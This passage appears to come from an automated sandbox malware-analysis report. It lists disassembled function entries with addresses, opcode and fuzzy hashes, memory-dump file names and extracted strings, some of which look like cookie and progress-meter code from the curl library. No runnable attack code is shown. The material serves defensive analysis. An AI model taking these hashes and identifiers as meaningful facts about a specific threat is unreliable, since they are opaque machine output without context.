                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a90550bc12f2b9ee5bea78bd28a37e70a7cecd02b7278216b19cd118b1a3f4df
                                                            • Instruction ID: e5a1028d48cfb56d1b0a4030c8e6a1bd05581100ec1d31b67f53c60af6a70d19
                                                            • Opcode Fuzzy Hash: a90550bc12f2b9ee5bea78bd28a37e70a7cecd02b7278216b19cd118b1a3f4df
                                                            • Instruction Fuzzy Hash: 92318EEB02D118BCB25595812B54BFA676EE6D7330B308D37F817A45A2E2B44B4B11B1
                                                            Function 07400C03 Relevance: .2, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0210e2eff55606a1573d327f531f87b5a5b45790e5db2e0a358611ede7faf4a4
                                                            • Instruction ID: 7ce8b63b36deb7eba232edd5ddfd1ed75893b5b09daaa0d29d894a57eca706a4
                                                            • Opcode Fuzzy Hash: 0210e2eff55606a1573d327f531f87b5a5b45790e5db2e0a358611ede7faf4a4
                                                            • Instruction Fuzzy Hash: 033180EB02D118BCB25595411B54BFA676EE6D7330F308C37F807D45A2E2B84A4B11B1
                                                            Function 07400C54 Relevance: .2, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fde468dd6778241a931a3ca072cdcb13b4f5a462fb7dca5a5566f6278d82eab9
                                                            • Instruction ID: bb16d3b24d6e02e7d6e36fd4130f208dca0a5372721d0529f449c94ff551978d
                                                            • Opcode Fuzzy Hash: fde468dd6778241a931a3ca072cdcb13b4f5a462fb7dca5a5566f6278d82eab9
                                                            • Instruction Fuzzy Hash: 7831BFEB02C114BDA25595411B54BFA676EE6D7230F308C37F807D55A2E3B88A4B11B1
                                                            Function 07400C36 Relevance: .2, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0f697e570dc7929080a61868b3b40b17e0ac2f1edfe65ad9bdedd43cd11deab
                                                            • Instruction ID: 72694a7b46e60cafa0269968e2e93f75d539aa2eb3ac9e327bc64a71b597013b
                                                            • Opcode Fuzzy Hash: c0f697e570dc7929080a61868b3b40b17e0ac2f1edfe65ad9bdedd43cd11deab
                                                            • Instruction Fuzzy Hash: 3531F3EB01D118BCB21595811B54BFA6B6EE6C7330F318C37F807E55A2E2B84B4B51B1
                                                            Function 07400D09 Relevance: .2, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e22823a2af0fa860aa2178166067df75531e2eb5484b68720511d8366c224156
                                                            • Instruction ID: a8791db8c0ae99aeb5276f56c87a25fa439891c5ce8504592c9550504737df97
                                                            • Opcode Fuzzy Hash: e22823a2af0fa860aa2178166067df75531e2eb5484b68720511d8366c224156
                                                            • Instruction Fuzzy Hash: CC31F4EB01D154BCB20695511B10BFA6B6EEAC3230B308C37F807D51A2D2B85B4B52F1
                                                            Function 07400C7E Relevance: .2, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c6dd8ee26a88ec96b75a63a149f0dffe8f291a112800afd40ee1655d4d6e7d5
                                                            • Instruction ID: 1bfd83e413600f57efd50a8ff9d1d6181d3871272998b50d64179e12ff71ab5c
                                                            • Opcode Fuzzy Hash: 5c6dd8ee26a88ec96b75a63a149f0dffe8f291a112800afd40ee1655d4d6e7d5
                                                            • Instruction Fuzzy Hash: F331A0EB02D118BCB25595812B54BFA676EE6D7330F308C37F807E55A2E2B85B4B11B1
                                                            Function 07400C8E Relevance: .2, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8fc424402cf24df294a0eeb1d121dd5217389e07f6f2f666e6176100808264f
                                                            • Instruction ID: f3ce724f5042afb81d27e4f4ccd453062bbd12a9e2e10d2d760b7b28b8c44cb2
                                                            • Opcode Fuzzy Hash: f8fc424402cf24df294a0eeb1d121dd5217389e07f6f2f666e6176100808264f
                                                            • Instruction Fuzzy Hash: CF31A3EB01C118BCB25595415B54BFA676EE6D7330B308C37F807E55A2E2B85B4B11F1
                                                            Function 07400C9F Relevance: .2, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b025064c0eaa7427e93c5140244975bec002e0fad96dd661b73927f0fe08d215
                                                            • Instruction ID: 0d108dddd8606145656ae60a1f2f8af0e75d3f9666fd69559efcddca82e8af1d
                                                            • Opcode Fuzzy Hash: b025064c0eaa7427e93c5140244975bec002e0fad96dd661b73927f0fe08d215
                                                            • Instruction Fuzzy Hash: A131C0EB01C118BDB25595415B50BFBA76EEAC7330B308C37F807E52A2E2B49B4B11B1
                                                            Function 07400D1B Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a975558f826ae70f60c078c4bf11e02ece5dfa3243efcaa747a677b46d3064e9
                                                            • Instruction ID: 797e6283c559c2fa4630a92a2f8544bb72c2b16142c20964b19096d1276a3bae
                                                            • Opcode Fuzzy Hash: a975558f826ae70f60c078c4bf11e02ece5dfa3243efcaa747a677b46d3064e9
                                                            • Instruction Fuzzy Hash: 5E31D2EB01D159BDB252D5415B54BFA6B6EEAC3730B308C37F807E51A2E2A84E4B11B1
                                                            Function 07400CB3 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4668c30ccd2ea2475366671fa04911cce401ad2503e6c32f88018a8b34517527
                                                            • Instruction ID: f0a71ca183a036b5d72b71cba48421f3b7fdf8873b9b79931640590fffa178dd
                                                            • Opcode Fuzzy Hash: 4668c30ccd2ea2475366671fa04911cce401ad2503e6c32f88018a8b34517527
                                                            • Instruction Fuzzy Hash: DF31D2EB01D154BDB24195415B50BFB676EEAC7330F308C37F807E51A2E2B45A4B11B1
                                                            Function 07400CDB Relevance: .2, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1257dd87715f338caa654279050ebe2dcf1a849132781644c97b9648f09dab5c
                                                            • Instruction ID: 63ac8fa2b04059f3fd9d6a308c3c7d54717f1ed3d3c2eeec2066cff9a410f904
                                                            • Opcode Fuzzy Hash: 1257dd87715f338caa654279050ebe2dcf1a849132781644c97b9648f09dab5c
                                                            • Instruction Fuzzy Hash: 6B31EEEA11C118BDB21195412B04BFB672EEAC3730B308837F817E51A2D2B89A4B11F1
                                                            Function 07400CC7 Relevance: .2, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12287af709ecfb1cd123e99e06e62d817ad1c319d48dee523e6ff4b4db05ba27
                                                            • Instruction ID: e23cfe40fe43470b2d9f6cb938304b0deeff89e559f5dc7df84f875220d8e07f
                                                            • Opcode Fuzzy Hash: 12287af709ecfb1cd123e99e06e62d817ad1c319d48dee523e6ff4b4db05ba27
                                                            • Instruction Fuzzy Hash: 0431B0EB01C118BDB241D5812B54BFA6B6EEAC7330B308C37F807E51A2D2A45F4B11B1
                                                            Function 07400CF2 Relevance: .1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6778a8aba5a3fc3a2af02abaf1b411c91c4899b32595c8f11e136ca62a66cd7
                                                            • Instruction ID: 2c79c04b74afc52af9155a1467213adbaabe9b7dc20795882404feb31d3327d2
                                                            • Opcode Fuzzy Hash: c6778a8aba5a3fc3a2af02abaf1b411c91c4899b32595c8f11e136ca62a66cd7
                                                            • Instruction Fuzzy Hash: 6E31C0EB11D154BDB24295412B14BFA6B2EEAC3330B318C37F807E55A2D2B49E8F51B1
                                                            Function 07400D2F Relevance: .1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2391fe7f5b35f0bea11809658c1d3fd23cfc667f0f9520215c3efb6fabca14bd
                                                            • Instruction ID: 3b4048b5b15650591836a708f7a41fe33a4bfc9e83fd507d7e530ec89bfc8819
                                                            • Opcode Fuzzy Hash: 2391fe7f5b35f0bea11809658c1d3fd23cfc667f0f9520215c3efb6fabca14bd
                                                            • Instruction Fuzzy Hash: 4421DDEB11D118BDA211A5812B14BFB676EE6C3730B318C37F803E5492E2B85E4B51B1
                                                            Function 07400D4C Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e35b692a59d26391bb53dabe032b2e981b3f36f48c7c324451ab2ce014c46577
                                                            • Instruction ID: 5d479a904c39b81cdc07c898716e6bd93f9229bf0c52b9f3219f2afd6a8c8ab6
                                                            • Opcode Fuzzy Hash: e35b692a59d26391bb53dabe032b2e981b3f36f48c7c324451ab2ce014c46577
                                                            • Instruction Fuzzy Hash: 9E21E2EB11D159BCB24195412B54BFA672EEAC3330B308C37F817E45A2E2B89E4B11F1
                                                            Function 07400D71 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f00e861d0a79e8a88b819a3237ba1a0700f4daac769bafa7fc2c5080e368275
                                                            • Instruction ID: f82328909519a7ce49eb80e9a5a72179d9636ead4e650f0e55b400ea9a03420f
                                                            • Opcode Fuzzy Hash: 6f00e861d0a79e8a88b819a3237ba1a0700f4daac769bafa7fc2c5080e368275
                                                            • Instruction Fuzzy Hash: B211D1F711D118BDA201D5502B50BFA672AE6C7330B318C37F803E50A2D2B45E4A52F1
                                                            Function 07400D97 Relevance: .1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b77e6489ed53eafc759716822991e8c0f8c21c5a89834d4a297d89cf2a5e00d
                                                            • Instruction ID: 21af0223b7790c9640b6b35f7c964082f7f005a9780c6c0090a39ae619f9b542
                                                            • Opcode Fuzzy Hash: 5b77e6489ed53eafc759716822991e8c0f8c21c5a89834d4a297d89cf2a5e00d
                                                            • Instruction Fuzzy Hash: 9E2134F700C158EDA201D5501A50BFB272AEAC3330B318C3BF802E51A2C2745E4B42F2
                                                            Function 07400D83 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c5aeba5ec371ef5898c5f6e332f136897df39e1f97512ce1281bbda56acb911
                                                            • Instruction ID: 2180a67b38900c94180306aee4d0a48439aef9ba4db4f92bfda0d677b0223812
                                                            • Opcode Fuzzy Hash: 2c5aeba5ec371ef5898c5f6e332f136897df39e1f97512ce1281bbda56acb911
                                                            • Instruction Fuzzy Hash: CF11DFF711D158BDA241D5511A50BFB272AEAC7330F318C7BF806E51A2D2784E4B52F2
                                                            Function 07400DCC Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597137828.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7400000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be31cc3cfeb561c85003a40eda37e303f77a57b3ba3b0f0526286e919286f929
                                                            • Instruction ID: b0f5706eaf800d935188b33f754158bd6a2bda635b08923005f10183ef75cfc1
                                                            • Opcode Fuzzy Hash: be31cc3cfeb561c85003a40eda37e303f77a57b3ba3b0f0526286e919286f929
                                                            • Instruction Fuzzy Hash: 590126E301D15CFCA24294901B407FA6B1AE6C3330F308C77E807A41A2D1B84E4741F1
                                                            Function 074A0F84 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f70b939b1e36f3279fbaa919798360f7776236772f96d73433155342797b6d39
                                                            • Instruction ID: 6ed6283dd3874bb67ddc212dcfa4513e1d555608293f062714ba22aa4bfe3662
                                                            • Opcode Fuzzy Hash: f70b939b1e36f3279fbaa919798360f7776236772f96d73433155342797b6d39
                                                            • Instruction Fuzzy Hash: 58D0C2A101C68AFFCF4226B849A22E99F540A2B304F011A17A942BB0F7B19110824082
                                                            Function 074A0FA7 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a23040424217668d1fdf26b7637b7a408dd1052ecd328076f75873015868a75d
                                                            • Instruction ID: b4d6eb090caa660e64b0ff5246bb82a35a35c95075e803225e001f617ad302fd
                                                            • Opcode Fuzzy Hash: a23040424217668d1fdf26b7637b7a408dd1052ecd328076f75873015868a75d
                                                            • Instruction Fuzzy Hash: EDD0A7F051D5C5FA8B820A9094C08F83B318D2B208B0009D6E5512D474A26201638642
                                                            Function 074A0FED Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 801f77fcf08a0d17212d11887df423e9ad7e8b280abdad479368004730bad7b4
                                                            • Instruction ID: 49b249c9f65d967fcd8cc05a3689f0dbb125df6bd6fd385d711a0ddf5c1f8422
                                                            • Opcode Fuzzy Hash: 801f77fcf08a0d17212d11887df423e9ad7e8b280abdad479368004730bad7b4
                                                            • Instruction Fuzzy Hash: 99C02BF137C607FD8B8A0D1C82E0AF819133A73300F158E17B903B44BCB2E1045B0881
                                                            Function 074A0FC1 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1597554954.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_74a0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22f6b51abd6b84bbba80abf8ac3e828d3ffd96afd74318d46db26a3fc042ff23
                                                            • Instruction ID: 5cc0a2829c8873e6b1ee3490620ddeefab8b3954af329c0cf5be9b10e500c470
                                                            • Opcode Fuzzy Hash: 22f6b51abd6b84bbba80abf8ac3e828d3ffd96afd74318d46db26a3fc042ff23
                                                            • Instruction Fuzzy Hash: 1DC02B8245C2439082D0041056C09F82780B0970341142B97E2F3183F0D24301034140

                                                            Non-executed Functions

                                                            Function 00701BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                            • API String ID: 0-1371176463
                                                            • Opcode ID: f66b9388b79e1c5be0564116b794aa1948afb4f18a0350bfbca677ecab764c4c
                                                            • Instruction ID: f93889f9e79df5e30892b71fdeed698d5e48cc52561d775e8c8e25aae5971806
                                                            • Opcode Fuzzy Hash: f66b9388b79e1c5be0564116b794aa1948afb4f18a0350bfbca677ecab764c4c
                                                            • Instruction Fuzzy Hash: 4FB21772A08301EBD7209A24DC4AB6BB7D5AF54704F08463CF989972D3EB79EC42D752
                                                            Function 006D4940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                            • API String ID: 0-122532811
                                                            • Opcode ID: 58d7d54c85dd8fe70ad28a9372837657fcf402d2c152ca615bda222aab2c5726
                                                            • Instruction ID: dd43ebfd3f4c78830712fd7e17a90c01ef25710a96ab0c75c006e0b3638e958b
                                                            • Opcode Fuzzy Hash: 58d7d54c85dd8fe70ad28a9372837657fcf402d2c152ca615bda222aab2c5726
                                                            • Instruction Fuzzy Hash: F042E6B1B08700AFD708DE28CC41BABB6EAEBC4704F04892DF55E97391D775AD148B92
                                                            Function 006D3ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                            • API String ID: 0-3977460686
                                                            • Opcode ID: 69b58a754b93cc6708c42cf36e6f3a74d46482ddbc81f632722d08a1250515e0
                                                            • Instruction ID: d55b110d7fc113af15ab5dfaeda906f7bdacd170a2071bf14c2dc1ae0bc3843a
                                                            • Opcode Fuzzy Hash: 69b58a754b93cc6708c42cf36e6f3a74d46482ddbc81f632722d08a1250515e0
